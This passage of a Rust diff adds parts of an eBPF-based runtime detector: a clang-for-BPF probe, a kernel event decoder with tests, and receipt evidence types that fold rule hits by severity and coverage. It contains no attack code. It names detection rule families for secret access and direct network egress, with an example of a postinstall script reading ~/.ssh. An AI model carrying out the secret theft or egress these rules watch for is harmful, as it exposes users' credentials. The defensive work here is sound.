+    let mut names: Vec<String> = Vec::new();
+    if let Ok(explicit) = std::env::var("CLANG") {
+        names.push(explicit);
+    }
+    names.push("clang".to_string());
+    // Newest first: a host with both clang-14 and clang-20 should use the one
+    // whose BPF backend knows about the newer instruction set.
+    for v in (14..=20).rev() {
+        names.push(format!("clang-{v}"));
+    }
+
+    for name in names {
+        let path = PathBuf::from(&name);
+        if targets_bpf(&path) {
+            return Some(path);
+        }
+    }
+    None
+}
+
+fn targets_bpf(clang: &Path) -> bool {
+    let out_dir = std::env::var("OUT_DIR").unwrap_or_else(|_| ".".to_string());
+    let probe_c = Path::new(&out_dir).join("h5i_bpf_probe.c");
+    let probe_o = Path::new(&out_dir).join("h5i_bpf_probe.o");
+    if std::fs::write(&probe_c, "int h5i_probe(void) { return 0; }\n").is_err() {
+        return false;
+    }
+    let ok = Command::new(clang)
+        .args(["-target", "bpf", "-O2", "-c"])
+        .arg(&probe_c)
+        .arg("-o")
+        .arg(&probe_o)
+        .output()
+        .map(|o| o.status.success())
+        .unwrap_or(false);
+    let _ = std::fs::remove_file(&probe_c);
+    let _ = std::fs::remove_file(&probe_o);
+    ok
+}

--- a/crates/h5i-bpf/src/event.rs
+++ b/crates/h5i-bpf/src/event.rs
@@ -1,0 +1,574 @@
+//! The event the kernel hands up, and the decoding of it.
+//!
+//! Mirrors `bpf/h5i_event.h` field for field. The two are held together by
+//! three things, in increasing order of how much they would embarrass us if
+//! they were the only one:
+//!
+//! 1. A compile-time assertion on [`RawEvent`]'s size and alignment here.
+//! 2. A magic word and a version in every record, checked on decode, so a
+//!    probe object and a loader that disagree are caught at the first event
+//!    rather than turned into plausible-looking nonsense.
+//! 3. `tests/wire_contract.rs`, which parses the C header and checks the
+//!    constants against the Rust ones — the only one of the three that
+//!    notices a *field* moving rather than the struct changing size.
+//!
+//! Nothing in this module does I/O or touches a kernel, so it compiles and is
+//! tested on every target h5i releases for, including the ones where eBPF is
+//! not a concept.
+
+use std::fmt;
+
+/// `"h5iE"`. Must equal `H5I_EVENT_MAGIC` in `bpf/h5i_event.h`.
+pub const EVENT_MAGIC: u32 = 0x6835_6945;
+/// Must equal `H5I_EVENT_VERSION`. Bumped when a field's meaning changes;
+/// appending a kind does not need a bump, because an unknown kind decodes to
+/// [`EventKind::Unknown`] rather than to garbage.
+pub const EVENT_VERSION: u16 = 1;
+
+pub const COMM_LEN: usize = 16;
+pub const PATH_LEN: usize = 256;
+pub const AUX_LEN: usize = 192;
+/// `aux` carries two independent strings at fixed offsets; see the header.
+pub const AUX_HALF: usize = 96;
+
+/// Ring-buffer geometry the loader programs. Must match the header.
+pub const MAX_PREFIX: usize = 16;
+pub const PREFIX_LEN: usize = 64;
+
+/// Statistics slots in the per-CPU counter array.
+pub const STAT_EMITTED: u32 = 0;
+pub const STAT_LOST: u32 = 1;
+pub const STAT_FILTERED: u32 = 2;
+pub const STAT_MAX: u32 = 3;
+
+/// The record exactly as it crosses the ring buffer.
+///
+/// `repr(C)` and never reordered: this is a wire type, not a domain type. The
+/// domain type is [`Event`], which is what everything above the loader sees.
+#[repr(C)]
+#[derive(Clone, Copy)]
+pub struct RawEvent {
+    pub magic: u32,
+    pub version: u16,
+    pub kind: u16,
+    pub ts_ns: u64,
+    pub tgid: u32,
+    pub tid: u32,
+    pub ppid: u32,
+    pub uid: u32,
+    pub a0: i64,
+    pub a1: i64,
+    pub a2: i64,
+    pub comm: [u8; COMM_LEN],
+    pub path: [u8; PATH_LEN],
+    pub aux: [u8; AUX_LEN],
+}
+
+// The C struct is 520 bytes with 8-byte alignment. If either side moves, this
+// is where the build stops.
+const _: () = assert!(std::mem::size_of::<RawEvent>() == 520);
+const _: () = assert!(std::mem::align_of::<RawEvent>() == 8);
+
+/// What the probe observed. Wire values; append, never renumber.
+#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord, Hash)]
+pub enum EventKind {
+    Exec,
+    Open,
+    Connect,
+    Socket,
+    Ptrace,
+    Bpf,
+    Nsop,
+    Module,
+    Memfd,
+    Mount,
+    Fork,
+    Exit,
+    /// A kind this build does not know. Carried rather than dropped so a
+    /// newer probe against an older loader degrades into "something happened
+    /// that I cannot name", which is a true statement, instead of into
+    /// silence, which is not.
+    Unknown(u16),
+}
+
+impl EventKind {
+    pub fn from_wire(v: u16) -> Self {
+        match v {
+            1 => Self::Exec,
+            2 => Self::Open,
+            3 => Self::Connect,
+            4 => Self::Socket,
+            5 => Self::Ptrace,
+            6 => Self::Bpf,
+            7 => Self::Nsop,
+            8 => Self::Module,
+            9 => Self::Memfd,
+            10 => Self::Mount,
+            11 => Self::Fork,
+            12 => Self::Exit,
+            other => Self::Unknown(other),
+        }
+    }
+
+    pub fn to_wire(self) -> u16 {
+        match self {
+            Self::Exec => 1,
+            Self::Open => 2,
+            Self::Connect => 3,
+            Self::Socket => 4,
+            Self::Ptrace => 5,
+            Self::Bpf => 6,
+            Self::Nsop => 7,
+            Self::Module => 8,
+            Self::Memfd => 9,
+            Self::Mount => 10,
+            Self::Fork => 11,
+            Self::Exit => 12,
+            Self::Unknown(v) => v,
+        }
+    }
+
+    /// Short, stable name. Used in the receipt and by `detect rules`, so it is
+    /// part of the interface rather than a debug convenience.
+    pub fn as_str(self) -> &'static str {
+        match self {
+            Self::Exec => "exec",
+            Self::Open => "open",
+            Self::Connect => "connect",
+            Self::Socket => "socket",
+            Self::Ptrace => "ptrace",
+            Self::Bpf => "bpf",
+            Self::Nsop => "nsop",
+            Self::Module => "module",
+            Self::Memfd => "memfd",
+            Self::Mount => "mount",
+            Self::Fork => "fork",
+            Self::Exit => "exit",
+            Self::Unknown(_) => "unknown",
+        }
+    }
+
+    /// Every kind this build collects, in wire order. The kind mask the loader
+    /// pushes into the config map is built from this.
+    pub const ALL: [EventKind; 12] = [
+        Self::Exec,
+        Self::Open,
+        Self::Connect,
+        Self::Socket,
+        Self::Ptrace,
+        Self::Bpf,
+        Self::Nsop,
+        Self::Module,
+        Self::Memfd,
+        Self::Mount,
+        Self::Fork,
+        Self::Exit,
+    ];
+}
+
+impl fmt::Display for EventKind {
+    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
+        match self {
+            Self::Unknown(v) => write!(f, "unknown({v})"),
+            other => f.write_str(other.as_str()),
+        }
+    }
+}
+
+/// A socket address family, only as far as the rules care.
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub enum Family {
+    Unix,
+    Inet,
+    Inet6,
+    Other(i64),
+}
+
+impl Family {
+    pub fn from_wire(v: i64) -> Self {
+        match v {
+            1 => Self::Unix,
+            2 => Self::Inet,
+            10 => Self::Inet6,
+            other => Self::Other(other),
+        }
+    }
+
+    pub fn as_str(self) -> &'static str {
+        match self {
+            Self::Unix => "unix",
+            Self::Inet => "inet",
+            Self::Inet6 => "inet6",
+            Self::Other(_) => "other",
+        }
+    }
+}
+
+/// The decoded event, which is what the rules and the session see.
+///
+/// Strings are lossy-decoded and truncated at the first NUL. They are the
+/// bytes a *process* passed to a syscall, not anything the kernel resolved, so
+/// every consumer treats them as a hint (ROADMAP.md D13.3) — and they can
+/// contain anything, including terminal control sequences, which is why the
+/// rendering path runs them through `h5i_error::redact`.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub struct Event {
+    pub kind: EventKind,
+    pub ts_ns: u64,
+    pub tgid: u32,
+    pub tid: u32,
+    /// Filled in by the session from the Fork events it has already seen; the
+    /// probe never reports it (ROADMAP.md D5).
+    pub ppid: u32,
+    pub uid: u32,
+    pub a0: i64,
+    pub a1: i64,
+    pub a2: i64,
+    pub comm: String,
+    pub path: String,
+    /// `aux[..AUX_HALF]`, per kind: `argv[1]` for `Exec`, the source for
+    /// `Mount`, the raw address bytes for `Connect`.
+    pub aux: String,
+    /// `aux[AUX_HALF..]`: `argv[2]` for `Exec`, `put_old` for `pivot_root`.
+    pub aux2: String,
+    /// `Connect` only: the peer address, rendered. `None` for a family this
+    /// build does not render, which is not the same as "no address".
+    pub peer: Option<String>,
+}
+
+/// Why a ring-buffer record was not turned into an [`Event`].
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub enum DecodeError {
+    /// Fewer bytes than a record. A torn read, or a probe with a smaller
+    /// event.
+    Short { got: usize, want: usize },
+    /// The magic word is not ours.
+    Magic(u32),
+    /// Our magic, a version we do not speak.
+    Version(u16),
+}
+
+impl fmt::Display for DecodeError {
+    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
+        match self {
+            Self::Short { got, want } => {
+                write!(f, "ring-buffer record too short: {got} bytes, want {want}")
+            }
+            Self::Magic(m) => write!(
+                f,
+                "ring-buffer record has magic {m:#010x}, want {EVENT_MAGIC:#010x} \
+                 (a probe object from a different build)"
+            ),
+            Self::Version(v) => write!(
+                f,
+                "probe speaks event version {v}, this build speaks {EVENT_VERSION}"
+            ),
+        }
+    }
+}
+
+impl std::error::Error for DecodeError {}
+
+/// Take a NUL-terminated string out of a fixed byte field.
+///
+/// Lossy, deliberately: a path is whatever bytes a process passed, and
+/// refusing to decode invalid UTF-8 would mean the one event most worth
+/// looking at — a deliberately mangled path — is the one that disappears.
+fn cstr(bytes: &[u8]) -> String {
+    let end = bytes.iter().position(|&b| b == 0).unwrap_or(bytes.len());
+    String::from_utf8_lossy(&bytes[..end]).into_owned()
+}
+
+/// Render an `AF_UNIX` `sun_path`, including the abstract-namespace form.
+///
+/// An abstract socket's name starts with a NUL, so `cstr` would render every
+/// one of them as the empty string — and abstract sockets are exactly the ones
+/// worth seeing, since that is how a browser's daemon, a D-Bus and an X server
+/// are all reached.
+fn unix_path(bytes: &[u8]) -> String {
+    if bytes.first() == Some(&0) {
+        let rest = &bytes[1..];
+        let end = rest.iter().position(|&b| b == 0).unwrap_or(rest.len());
+        format!("@{}", String::from_utf8_lossy(&rest[..end]))
+    } else {
+        cstr(bytes)
+    }
+}
+
+fn render_ipv4(b: &[u8]) -> Option<String> {
+    (b.len() >= 4).then(|| format!("{}.{}.{}.{}", b[0], b[1], b[2], b[3]))
+}
+
+fn render_ipv6(b: &[u8]) -> Option<String> {
+    if b.len() < 16 {
+        return None;
+    }
+    let groups: Vec<String> = (0..8)
+        .map(|i| format!("{:x}", u16::from_be_bytes([b[i * 2], b[i * 2 + 1]])))
+        .collect();
+    Some(groups.join(":"))
+}
+
+impl Event {
+    /// Decode one ring-buffer record.
+    ///
+    /// Reads the header fields out of the byte slice explicitly rather than
+    /// casting to `RawEvent`: a ring-buffer record is only 8-byte aligned by
+    /// convention, and `RawEvent` needs 8-byte alignment, so a cast would be
+    /// unsound the day the convention changes. The field-by-field read costs
+    /// nothing measurable at these volumes and cannot be wrong.
+    pub fn decode(buf: &[u8]) -> Result<Self, DecodeError> {
+        const SZ: usize = std::mem::size_of::<RawEvent>();
+        if buf.len() < SZ {
+            return Err(DecodeError::Short {
+                got: buf.len(),
+                want: SZ,
+            });
+        }
+        let u32_at = |o: usize| u32::from_ne_bytes([buf[o], buf[o + 1], buf[o + 2], buf[o + 3]]);
+        let u16_at = |o: usize| u16::from_ne_bytes([buf[o], buf[o + 1]]);
+        let i64_at = |o: usize| {
+            i64::from_ne_bytes([
+                buf[o],
+                buf[o + 1],
+                buf[o + 2],
+                buf[o + 3],
+                buf[o + 4],
+                buf[o + 5],
+                buf[o + 6],
+                buf[o + 7],
+            ])
+        };
+
+        let magic = u32_at(0);
+        if magic != EVENT_MAGIC {
+            return Err(DecodeError::Magic(magic));
+        }
+        let version = u16_at(4);
+        if version != EVENT_VERSION {
+            return Err(DecodeError::Version(version));
+        }
+        let kind = EventKind::from_wire(u16_at(6));
+        let ts_ns = i64_at(8) as u64;
+        let tgid = u32_at(16);
+        let tid = u32_at(20);
+        let ppid = u32_at(24);
+        let uid = u32_at(28);
+        let a0 = i64_at(32);
+        let a1 = i64_at(40);
+        let a2 = i64_at(48);
+
+        const COMM_OFF: usize = 56;
+        const PATH_OFF: usize = COMM_OFF + COMM_LEN;
+        const AUX_OFF: usize = PATH_OFF + PATH_LEN;
+
+        let comm = cstr(&buf[COMM_OFF..COMM_OFF + COMM_LEN]);
+        let path_bytes = &buf[PATH_OFF..PATH_OFF + PATH_LEN];
+        let aux_bytes = &buf[AUX_OFF..AUX_OFF + AUX_LEN];
+
+        // `Connect` reuses the string fields as binary: the address bytes go in
+        // `aux`, and an `AF_UNIX` peer goes in `path` where a leading NUL is
+        // meaningful. Decoding those as C strings would silently blank both.
+        let (path, aux, aux2, peer) = match kind {
+            EventKind::Connect => match Family::from_wire(a0) {
+                Family::Inet => (String::new(), String::new(), String::new(), render_ipv4(aux_bytes)),
+                Family::Inet6 => (String::new(), String::new(), String::new(), render_ipv6(aux_bytes)),
+                Family::Unix => {
+                    let p = unix_path(path_bytes);
+                    let peer = (!p.is_empty()).then(|| p.clone());
+                    (p, String::new(), String::new(), peer)
+                }
+                Family::Other(_) => (String::new(), String::new(), String::new(), None),
+            },
+            _ => (
+                cstr(path_bytes),
+                cstr(&aux_bytes[..AUX_HALF]),
+                cstr(&aux_bytes[AUX_HALF..]),
+                None,
+            ),
+        };
+
+        Ok(Event {
+            kind,
+            ts_ns,
+            tgid,
+            tid,
+            ppid,
+            uid,
+            a0,
+            a1,
+            a2,
+            comm,
+            path,
+            aux,
+            aux2,
+            peer,
+        })
+    }
+
+    /// `Open`: did the caller ask for write access?
+    pub fn write_intent(&self) -> bool {
+        self.kind == EventKind::Open && self.a1 != 0
+    }
+
+    /// `Connect`: the peer port in host byte order.
+    pub fn port(&self) -> Option<u16> {
+        (self.kind == EventKind::Connect).then(|| u16::try_from(self.a1).unwrap_or(0))
+    }
+
+    /// `Connect`: the address family.
+    pub fn family(&self) -> Option<Family> {
+        matches!(self.kind, EventKind::Connect | EventKind::Socket)
+            .then(|| Family::from_wire(self.a0))
+    }
+
+    /// The command line, as far as the probe captured it: the executable plus
+    /// `argv[1]` and `argv[2]`. Only meaningful for `Exec`.
+    pub fn cmdline(&self) -> String {
+        let mut s = self.path.clone();
+        for part in [&self.aux, &self.aux2] {
+            if !part.is_empty() {
+                s.push(' ');
+                s.push_str(part);
+            }
+        }
+        s
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    /// Build a wire record the way the probe would, so the decoder is tested
+    /// against bytes rather than against itself.
+    pub(crate) fn wire(kind: u16, a0: i64, a1: i64, a2: i64, path: &[u8], aux: &[u8]) -> Vec<u8> {
+        let mut b = vec![0u8; std::mem::size_of::<RawEvent>()];
+        b[0..4].copy_from_slice(&EVENT_MAGIC.to_ne_bytes());
+        b[4..6].copy_from_slice(&EVENT_VERSION.to_ne_bytes());
+        b[6..8].copy_from_slice(&kind.to_ne_bytes());
+        b[8..16].copy_from_slice(&7u64.to_ne_bytes());
+        b[16..20].copy_from_slice(&100u32.to_ne_bytes());
+        b[20..24].copy_from_slice(&100u32.to_ne_bytes());
+        b[24..28].copy_from_slice(&0u32.to_ne_bytes());
+        b[28..32].copy_from_slice(&1000u32.to_ne_bytes());
+        b[32..40].copy_from_slice(&a0.to_ne_bytes());
+        b[40..48].copy_from_slice(&a1.to_ne_bytes());
+        b[48..56].copy_from_slice(&a2.to_ne_bytes());
+        b[56..60].copy_from_slice(b"sh\0\0");
+        let po = 72;
+        b[po..po + path.len()].copy_from_slice(path);
+        let ao = po + PATH_LEN;
+        b[ao..ao + aux.len()].copy_from_slice(aux);
+        b
+    }
+
+    #[test]
+    fn decodes_an_exec() {
+        let raw = wire(1, 3, 0, 0, b"/bin/sh\0", b"-c\0");
+        let e = Event::decode(&raw).unwrap();
+        assert_eq!(e.kind, EventKind::Exec);
+        assert_eq!(e.path, "/bin/sh");
+        assert_eq!(e.aux, "-c");
+        assert_eq!(e.a0, 3);
+        assert_eq!(e.comm, "sh");
+    }
+
+    #[test]
+    fn exec_carries_both_argv_slots() {
+        let mut aux = vec![0u8; AUX_LEN];
+        aux[..2].copy_from_slice(b"-c");
+        aux[AUX_HALF..AUX_HALF + 4].copy_from_slice(b"true");
+        let raw = wire(1, 3, 0, 0, b"/bin/sh\0", &aux);
+        let e = Event::decode(&raw).unwrap();
+        assert_eq!(e.aux, "-c");
+        assert_eq!(e.aux2, "true");
+        assert_eq!(e.cmdline(), "/bin/sh -c true");
+    }
+
+    #[test]
+    fn decodes_an_ipv4_connect() {
+        let raw = wire(3, 2, 443, 16, b"", &[93, 184, 216, 34]);
+        let e = Event::decode(&raw).unwrap();
+        assert_eq!(e.family(), Some(Family::Inet));
+        assert_eq!(e.port(), Some(443));
+        assert_eq!(e.peer.as_deref(), Some("93.184.216.34"));
+    }
+
+    #[test]
+    fn decodes_an_ipv6_connect() {
+        let mut addr = [0u8; 16];
+        addr[0] = 0x20;
+        addr[1] = 0x01;
+        addr[15] = 0x01;
+        let raw = wire(3, 10, 80, 28, b"", &addr);
+        let e = Event::decode(&raw).unwrap();
+        assert_eq!(e.peer.as_deref(), Some("2001:0:0:0:0:0:0:1"));
+    }
+
+    /// An abstract socket's name begins with a NUL. Rendering it as an empty
+    /// string would hide exactly the sockets worth seeing.
+    #[test]
+    fn abstract_unix_sockets_are_not_blanked() {
+        let mut path = vec![0u8; 32];
+        path[1..8].copy_from_slice(b"h5i.sok");
+        let raw = wire(3, 1, 0, 0, &path, b"");
+        let e = Event::decode(&raw).unwrap();
+        assert_eq!(e.peer.as_deref(), Some("@h5i.sok"));
+    }
+
+    #[test]
+    fn filesystem_unix_sockets_decode_as_paths() {
+        let raw = wire(3, 1, 0, 0, b"/run/user/1000/bus\0", b"");
+        let e = Event::decode(&raw).unwrap();
+        assert_eq!(e.peer.as_deref(), Some("/run/user/1000/bus"));
+    }
+
+    #[test]
+    fn a_foreign_magic_is_refused_not_guessed() {
+        let mut raw = wire(1, 0, 0, 0, b"/bin/true\0", b"");
+        raw[0] = 0xff;
+        assert!(matches!(Event::decode(&raw), Err(DecodeError::Magic(_))));
+    }
+
+    #[test]
+    fn a_future_version_is_refused() {
+        let mut raw = wire(1, 0, 0, 0, b"/bin/true\0", b"");
+        raw[4..6].copy_from_slice(&(EVENT_VERSION + 1).to_ne_bytes());
+        assert!(matches!(Event::decode(&raw), Err(DecodeError::Version(_))));
+    }
+
+    #[test]
+    fn a_torn_record_is_short_not_panicking() {
+        let raw = wire(1, 0, 0, 0, b"/bin/true\0", b"");
+        assert!(matches!(
+            Event::decode(&raw[..64]),
+            Err(DecodeError::Short { .. })
+        ));
+    }
+
+    /// An unknown kind must survive as "something I cannot name", because the
+    /// alternative — dropping it — makes a newer probe look like a quiet one.
+    #[test]
+    fn an_unknown_kind_survives() {
+        let raw = wire(999, 0, 0, 0, b"/x\0", b"");
+        let e = Event::decode(&raw).unwrap();
+        assert_eq!(e.kind, EventKind::Unknown(999));
+        assert_eq!(e.kind.to_string(), "unknown(999)");
+    }
+
+    #[test]
+    fn invalid_utf8_in_a_path_does_not_lose_the_event() {
+        let raw = wire(2, 0, 1, 0, &[0x2f, 0xff, 0xfe, 0x00], b"");
+        let e = Event::decode(&raw).unwrap();
+        assert!(e.path.starts_with('/'));
+        assert!(e.write_intent());
+    }
+
+    #[test]
+    fn kind_wire_values_round_trip() {
+        for k in EventKind::ALL {
+            assert_eq!(EventKind::from_wire(k.to_wire()), k);
+        }
+    }
+}

--- a/crates/h5i-bpf/src/evidence.rs
+++ b/crates/h5i-bpf/src/evidence.rs
@@ -1,0 +1,337 @@
+//! What the kernel lane puts in a receipt.
+//!
+//! These types are the *contract* between the detector and everything that
+//! reads it — the receipt, the console, the export report, `h5i box detect
+//! show`. They live here rather than in `h5i-core` so the rules engine can
+//! produce them directly, and they are plain serde types with no eBPF in
+//! them, so a build with `load` off still reads and renders a receipt written
+//! by a build that had it on.
+//!
+//! The shape follows one rule, and it is the same rule the rest of h5i's
+//! evidence follows: **never let an absence render as a clean result.** A run
+//! the detector could not watch carries [`RuntimeEvidence::unavailable`] with
+//! the reason; a run it watched incompletely carries
+//! [`Coverage::Partial`] with the reason; a run that dropped events carries
+//! [`RuntimeEvidence::events_lost`]. An empty `detections` list on its own
+//! never means "clean" — it means "clean *for what was collected*", and the
+//! other fields are what say how much that was.
+
+use serde::{Deserialize, Serialize};
+
+/// The lane string this evidence is filed under. Deliberately distinct from
+/// `host-env-run`, `tee-shim`, `shell-egress` and `runner-observed`: which
+/// observer saw a thing is not something a reader should ever have to infer.
+pub const LANE: &str = "kernel-bpf";
+
+/// How much of the run the detector could actually see.
+#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize, Default)]
+#[serde(rename_all = "lowercase")]
+pub enum Coverage {
+    /// The box's processes were all inside the scope.
+    Full,
+    /// Some of the box's work ran where this scope cannot reach it. The
+    /// container tier is the standing example: `conmon` double-forks and
+    /// reparents, so the workload leaves h5i's process tree.
+    Partial,
+    /// Nothing about the box's own execution was observable. The microVM tier
+    /// is the standing example: the workload's syscalls are made against a
+    /// guest kernel that this probe is not in.
+    #[default]
+    None,
+}
+
+impl Coverage {
+    pub fn as_str(self) -> &'static str {
+        match self {
+            Self::Full => "full",
+            Self::Partial => "partial",
+            Self::None => "none",
+        }
+    }
+}
+
+/// How loud a detection is. Ordered, so the console can badge a record by its
+/// worst finding without a second table.
+#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord, Serialize, Deserialize)]
+#[serde(rename_all = "lowercase")]
+pub enum Severity {
+    /// Worth recording, not worth reacting to. `exec.package-manager` is the
+    /// archetype: nobody is alarmed that `npm` ran, and everybody wants to
+    /// know it did once something else goes wrong.
+    Info,
+    /// Unusual for a development box, explicable.
+    Notice,
+    /// A boundary this product claims was pressed on.
+    Alert,
+}
+
+impl Severity {
+    pub fn as_str(self) -> &'static str {
+        match self {
+            Self::Info => "info",
+            Self::Notice => "notice",
+            Self::Alert => "alert",
+        }
+    }
+}
+
+/// One rule that fired, folded across every event that matched it.
+///
+/// Folded rather than listed: a `postinstall` that opens `~/.ssh` four hundred
+/// times is one finding with a count, not four hundred findings. The
+/// exemplars are what makes the count actionable, and they are capped so a
+/// flood becomes a number rather than a megabyte in the receipt.
+#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
+pub struct Detection {
+    /// Stable rule id, e.g. `net.direct-egress`.
+    pub rule: String,
+    /// Family the id's prefix names: `net`, `secret`, `exec`, `priv`,
+    /// `kernel`, `mount`.
+    pub family: String,
+    pub severity: Severity,
+    /// The rule's own one-line description. Carried in the record rather than
+    /// looked up at render time so an old receipt read by a new binary still
+    /// says what it meant when it was written.
+    pub title: String,
+    pub count: u64,
+    /// Nanoseconds on the kernel's monotonic clock, relative to boot. Kept raw
+    /// rather than converted: the wall clock is on the record already, and
+    /// converting would invent a precision the two clocks do not share.
+    pub first_ns: u64,
+    pub last_ns: u64,
+    /// Up to [`MAX_EXAMPLES`] rendered matches, control-sanitised.
+    #[serde(default, skip_serializing_if = "Vec::is_empty")]
+    pub examples: Vec<String>,
+    /// Matches beyond the exemplar cap, so a truncated list is never mistaken
+    /// for a complete one.
+    #[serde(default, skip_serializing_if = "std::ops::Not::not")]
+    pub examples_truncated: bool,
+}
+
+/// Exemplars kept per rule.
+pub const MAX_EXAMPLES: usize = 5;
+/// Longest exemplar kept, in bytes. A path can be a kilobyte, and a receipt is
+/// something a person reads.
+pub const MAX_EXAMPLE_LEN: usize = 240;
+
+/// The block the receipt carries.
+#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
+pub struct RuntimeEvidence {
+    /// Always [`LANE`]. Written out so a reader never has to know which field
+    /// of which struct implied which observer.
+    pub lane: String,
+    /// Which scope mechanism selected the events, e.g. `pidtree`.
+    pub scope: String,
+    pub coverage: Coverage,
+    /// Why coverage is not `full`. Present exactly when it is not.
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub coverage_reason: Option<String>,
+    /// Events the kernel emitted for this box and userspace decoded.
+    #[serde(default)]
+    pub events_seen: u64,
+    /// Events the kernel dropped for want of ring-buffer space, plus any the
+    /// userspace channel shed. Nonzero means the detections are a **lower
+    /// bound**, and every renderer says so.
+    #[serde(default)]
+    pub events_lost: u64,
+    /// Events the probe discarded in the kernel because no rule wanted them —
+    /// almost entirely read-only `openat`. Recorded because it is the number
+    /// that says whether the in-kernel filter is doing its job.
+    #[serde(default)]
+    pub events_filtered: u64,
+    #[serde(default, skip_serializing_if = "Vec::is_empty")]
+    pub detections: Vec<Detection>,
+    /// Set when the detector did not run. The block is written anyway, with
+    /// this filled in: a missing block would be indistinguishable from a
+    /// quiet one, and that is the confusion this whole lane exists to remove.
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub unavailable: Option<String>,
+}
+
+impl RuntimeEvidence {
+    /// The block for a run the detector could not watch.
+    pub fn unavailable(reason: impl Into<String>) -> Self {
+        Self {
+            lane: LANE.to_string(),
+            scope: "none".to_string(),
+            coverage: Coverage::None,
+            coverage_reason: None,
+            events_seen: 0,
+            events_lost: 0,
+            events_filtered: 0,
+            detections: Vec::new(),
+            unavailable: Some(reason.into()),
+        }
+    }
+
+    /// Did the detector observe anything at all? The question a renderer has
+    /// to answer before it is allowed to draw a green badge.
+    pub fn observed(&self) -> bool {
+        self.unavailable.is_none() && self.coverage != Coverage::None
+    }
+
+    /// The worst severity present, or `None` when nothing fired.
+    pub fn worst(&self) -> Option<Severity> {
+        self.detections.iter().map(|d| d.severity).max()
+    }
+
+    /// A one-line summary, for a list view.
+    ///
+    /// The wording is load-bearing. "no detections" is only ever said about a
+    /// run that was actually watched; anything else says why it was not, so
+    /// the line can never be read as a clean bill of health for a run nobody
+    /// looked at.
+    pub fn summary(&self) -> String {
+        if let Some(why) = &self.unavailable {
+            return format!("not observed ({why})");
+        }
+        if self.coverage == Coverage::None {
+            let why = self.coverage_reason.as_deref().unwrap_or("out of scope");
+            return format!("not observed ({why})");
+        }
+        let mut s = if self.detections.is_empty() {
+            format!("no detections in {} events", self.events_seen)
+        } else {
+            let alerts = self
+                .detections
+                .iter()
+                .filter(|d| d.severity == Severity::Alert)
+                .count();
+            let total: u64 = self.detections.iter().map(|d| d.count).sum();
+            format!(
+                "{} rule{} fired ({total} match{}), {alerts} alert{}",
+                self.detections.len(),
+                if self.detections.len() == 1 { "" } else { "s" },
+                if total == 1 { "" } else { "es" },
+                if alerts == 1 { "" } else { "s" },
+            )
+        };
+        if self.coverage == Coverage::Partial {
+            s.push_str(" — partial coverage");
+        }
+        if self.events_lost > 0 {
+            s.push_str(&format!(" — {} events lost", self.events_lost));
+        }
+        s
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    fn det(rule: &str, sev: Severity, count: u64) -> Detection {
+        Detection {
+            rule: rule.into(),
+            family: rule.split('.').next().unwrap_or("").into(),
+            severity: sev,
+            title: "t".into(),
+            count,
+            first_ns: 1,
+            last_ns: 2,
+            examples: Vec::new(),
+            examples_truncated: false,
+        }
+    }
+
+    #[test]
+    fn severity_orders_worst_last() {
+        assert!(Severity::Alert > Severity::Notice);
+        assert!(Severity::Notice > Severity::Info);
+    }
+
+    #[test]
+    fn an_unavailable_block_never_reads_as_clean() {
+        let e = RuntimeEvidence::unavailable("missing CAP_BPF");
+        assert!(!e.observed());
+        assert!(e.summary().starts_with("not observed"));
+        assert!(e.summary().contains("CAP_BPF"));
+        assert_eq!(e.worst(), None);
+    }
+
+    /// The failure this guards against is specific: a `coverage = none` block
+    /// with an empty detection list rendering the same as a watched, quiet
+    /// run.
+    #[test]
+    fn zero_coverage_never_reads_as_clean_either() {
+        let e = RuntimeEvidence {
+            lane: LANE.into(),
+            scope: "pidtree".into(),
+            coverage: Coverage::None,
+            coverage_reason: Some("the microVM tier runs a guest kernel".into()),
+            events_seen: 0,
+            events_lost: 0,
+            events_filtered: 0,
+            detections: Vec::new(),
+            unavailable: None,
+        };
+        assert!(!e.observed());
+        assert!(e.summary().contains("guest kernel"));
+    }
+
+    #[test]
+    fn a_watched_quiet_run_says_how_much_was_watched() {
+        let e = RuntimeEvidence {
+            lane: LANE.into(),
+            scope: "pidtree".into(),
+            coverage: Coverage::Full,
+            coverage_reason: None,
+            events_seen: 412,
+            events_lost: 0,
+            events_filtered: 90_000,
+            detections: Vec::new(),
+            unavailable: None,
+        };
+        assert!(e.observed());
+        assert_eq!(e.summary(), "no detections in 412 events");
+    }
+
+    #[test]
+    fn loss_and_partial_coverage_are_both_in_the_line() {
+        let e = RuntimeEvidence {
+            lane: LANE.into(),
+            scope: "pidtree".into(),
+            coverage: Coverage::Partial,
+            coverage_reason: Some("container".into()),
+            events_seen: 10,
+            events_lost: 3,
+            events_filtered: 0,
+            detections: vec![det("net.direct-egress", Severity::Alert, 2)],
+            unavailable: None,
+        };
+        let s = e.summary();
+        assert!(s.contains("1 rule fired"), "{s}");
+        assert!(s.contains("partial coverage"), "{s}");
+        assert!(s.contains("3 events lost"), "{s}");
+        assert_eq!(e.worst(), Some(Severity::Alert));
+    }
+
+    #[test]
+    fn the_block_round_trips_through_json() {
+        let e = RuntimeEvidence {
+            lane: LANE.into(),
+            scope: "pidtree".into(),
+            coverage: Coverage::Full,
+            coverage_reason: None,
+            events_seen: 5,
+            events_lost: 0,
+            events_filtered: 1,
+            detections: vec![det("kernel.bpf", Severity::Alert, 1)],
+            unavailable: None,
+        };
+        let j = serde_json::to_string(&e).unwrap();
+        let back: RuntimeEvidence = serde_json::from_str(&j).unwrap();
+        assert_eq!(e, back);
+    }
+
+    /// Old records predate every count field. They must still read, or
+    /// upgrading h5i would make yesterday's evidence unreadable.
+    #[test]
+    fn a_minimal_block_deserializes() {
+        let j = r#"{"lane":"kernel-bpf","scope":"pidtree","coverage":"full"}"#;
+        let e: RuntimeEvidence = serde_json::from_str(j).unwrap();
+        assert_eq!(e.events_seen, 0);
